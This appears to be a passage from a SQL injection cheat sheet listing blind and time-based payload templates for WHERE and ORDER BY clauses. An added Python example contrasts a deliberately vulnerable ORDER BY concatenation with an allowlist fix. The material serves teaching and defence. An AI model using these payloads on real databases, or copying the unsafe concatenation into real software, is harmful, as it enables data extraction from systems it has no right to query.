Injection by clause
A list of payloads showing how the injection can be carried out depending on the clause.
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;
[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);
[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));
- The order in which the contents are displayed reveals whether the subquery was true or false.
[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));
- The number of seconds passed to the sleep function is multiplied by the number of rows returned by the main query.
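Why the ORDER BY forms above work and how to close them, as an added example that is not part of the original page: ORDER BY accepts an expression and a column name cannot be sent as a bound parameter, so the sort key has to be mapped through an allowlist. The table, the function names and the two subqueries are constructed for illustration, run against Python's built-in sqlite3.

```python
import sqlite3

def make_db():
    # Constructed sample data held in memory, not taken from the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER, name TEXT, price INTEGER)")
    db.executemany(
        "INSERT INTO items VALUES (?, ?, ?)",
        [(1, "cable", 30), (2, "adapter", 10), (3, "battery", 20)],
    )
    return db

# The page's ORDER BY shape with column1=id, column2=price and a constructed
# subquery that is true in one string and false in the other.
CASE_TRUE = ("(SELECT (CASE WHEN EXISTS(SELECT 1 FROM items WHERE price > 25) "
             "THEN id ELSE price END))")
CASE_FALSE = ("(SELECT (CASE WHEN EXISTS(SELECT 1 FROM items WHERE price > 99) "
              "THEN id ELSE price END))")

def list_items_unsafe(db, sort):
    # Weak form: the client-supplied sort value is concatenated into the
    # statement, so any expression is accepted and the row order becomes a
    # true/false signal for whatever subquery the value contains.
    sql = "SELECT id FROM items WHERE price > 0 ORDER BY " + sort
    return [row[0] for row in db.execute(sql)]

# Hardened form: only these keys are accepted, and the text that reaches the
# statement is the fixed value from this mapping, never the client's string.
SORT_COLUMNS = {"id": "id", "name": "name", "price": "price"}

def list_items_safe(db, sort):
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError("unsupported sort key")
    sql = "SELECT id FROM items WHERE price > 0 ORDER BY " + column
    return [row[0] for row in db.execute(sql)]

if __name__ == "__main__":
    db = make_db()
    print("unsafe, subquery true :", list_items_unsafe(db, CASE_TRUE))
    print("unsafe, subquery false:", list_items_unsafe(db, CASE_FALSE))
    print("safe, sort by price   :", list_items_safe(db, "price"))
    try:
        list_items_safe(db, CASE_TRUE)
    except ValueError as exc:
        print("safe, expression      : rejected (%s)" % exc)
```

The same allowlist check is a useful place to log rejected sort values, since parentheses or keywords such as CASE or SLEEP in a sort parameter have no legitimate use.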